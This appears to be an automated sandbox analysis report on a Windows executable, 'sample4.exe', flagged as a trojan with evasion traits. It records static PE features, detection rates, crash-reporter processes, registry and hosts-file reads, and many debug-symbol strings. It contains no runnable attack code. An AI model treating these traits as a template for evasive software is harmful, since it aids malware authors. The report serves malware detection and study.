Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: classification engine

Classification label: mal100.troj.evad.winEXE@6/20@8/2

Source: C:\Users\user\Desktop\sample4.exe

Code function: 0_2_0012D0B0 FindResourceW,LoadResource,LockResource,GlobalFree,

0_2_0012D0B0

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2100

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERABCC.tmp

Jump to behavior

Source: sample4.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\sample4.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\sample4.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\sample4.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: sample4.exe	Virustotal: Detection: 77%
Source: sample4.exe	ReversingLabs: Detection: 79%

Source: unknown	Process created: C:\Users\user\Desktop\sample4.exe 'C:\Users\user\Desktop\sample4.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 768
Source: unknown	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 804
Source: unknown	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 896
Source: unknown	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 924
Source: unknown	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 1224

Source: sample4.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: sample4.exe

Static file information: File size 2136576 > 1048576

Source: sample4.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1b0400

Source: sample4.exe

Static PE information: More than 200 imports for USER32.dll

Source: sample4.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: sample4.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: sample4.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: sample4.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: sample4.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: sample4.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: sample4.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: sample4.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: msvcrt.pdbk source: WerFault.exe, 00000011.00000003.373483424.0000000004FC2000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391461414.0000000004C72000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416001893.00000000052E2000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441781418.0000000005772000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462324420.0000000005672000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdbT source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb6 source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb7 source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: mskeyprotect.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000011.00000003.373483424.0000000004FC2000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391461414.0000000004C72000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416001893.00000000052E2000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441781418.0000000005772000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462324420.0000000005672000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb) source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000011.00000003.373522458.0000000004FC5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391461414.0000000004C72000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416219741.00000000052E6000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441846238.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462324420.0000000005672000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: cryptbase.pdb? source: WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp
Source:	Binary string: winnsi.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000011.00000003.373517949.0000000004FC0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.392471616.0000000004C70000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416196678.00000000052E0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441883039.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462446132.0000000005670000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000011.00000003.373517949.0000000004FC0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.392471616.0000000004C70000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416196678.00000000052E0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441883039.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462446132.0000000005670000.00000004.00000040.sdmp
Source:	Binary string: dnsapi.pdbf source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: schannel.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: rasadhlp.pdbt source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb- source: WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb, source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdbx source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdbl source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: comdlg32.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb\| source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: nsi.pdb source: WerFault.exe, 00000011.00000003.373534997.0000000004FD3000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391511057.0000000004C84000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: webio.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: oleacc.pdb1 source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb7 source: WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdbH source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: msasn1.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb# source: WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp
Source:	Binary string: comctl32v582.pdb source: WerFault.exe, 00000011.00000003.373522458.0000000004FC5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391461414.0000000004C72000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416219741.00000000052E6000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441846238.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462324420.0000000005672000.00000004.00000040.sdmp
Source:	Binary string: winhttp.pdb~ source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000011.00000003.373522458.0000000004FC5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391461414.0000000004C72000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416001893.00000000052E2000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441781418.0000000005772000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462324420.0000000005672000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000011.00000003.373517949.0000000004FC0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.392471616.0000000004C70000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416196678.00000000052E0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441883039.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462446132.0000000005670000.00000004.00000040.sdmp
Source:	Binary string: msimg32.pdbT source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb1 source: WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb/ source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: ncrypt.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: comctl32v582.pdbk source: WerFault.exe, 00000011.00000003.373522458.0000000004FC5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391461414.0000000004C72000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416219741.00000000052E6000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441846238.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462324420.0000000005672000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: ole32.pdb) source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb/ source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb& source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: rasadhlp.pdb source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb` source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: wininet.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: oleacc.pdb^ source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb" source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: ncryptsslp.pdb= source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: c:\Schoolwheel\Commontie\hithere\anyhit\Subtractmountain\TakeLand\Whilecardstone.pdb source: sample4.exe
Source:	Binary string: nsi.pdb_ source: WerFault.exe, 00000011.00000003.373534997.0000000004FD3000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391511057.0000000004C84000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: wmswsock.pdbh source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: wininet.pdb; source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000011.00000003.373522458.0000000004FC5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391461414.0000000004C72000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416219741.00000000052E6000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441846238.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462324420.0000000005672000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: oleacc.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb; source: WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: wininet.pdbJ source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb# source: WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp
Source:	Binary string: winnsi.pdbZ source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: mskeyprotect.pdb_ source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb5 source: WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb- source: WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: dnsapi.pdb source: WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb% source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: winhttp.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: msimg32.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: ntasn1.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdbF source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb, source: WerFault.exe, 00000011.00000003.373517949.0000000004FC0000.00000004.00000040.sdmp
Source:	Binary string: upwntdll.pdb source: WerFault.exe, 00000011.00000003.368397809.0000000004C0E000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.385905313.0000000004A4D000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.409232348.0000000002FAA000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.436877307.00000000051E4000.00000004.00000001.sdmp
Source:	Binary string: Windows.Storage.pdb# source: WerFault.exe, 00000020.00000003.441883039.0000000005770000.00000004.00000040.sdmp
Source:	Binary string: gdiplus.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb@ source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000011.00000003.368794303.0000000003011000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.385888353.0000000002BCD000.00000004.00000001.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdbv source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
